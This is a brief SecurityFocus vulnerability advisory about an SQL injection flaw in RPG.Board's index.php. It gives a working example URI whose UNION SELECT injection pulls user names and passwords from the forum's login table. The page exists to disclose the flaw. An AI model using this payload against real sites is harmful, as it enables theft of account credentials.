Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

RPG.Board 'index.php' SQL Injection Vulnerability

Attackers can exploit this issue via a browser.

The following example URI is available:

http://example.com/index.php?subtopic&showtopic=-0x90+union+select+null,null,null,concat(user,0x3a,pw),null+from+[PREFIX]_userlogin







 

Privacy Statement
Copyright 2009, SecurityFocus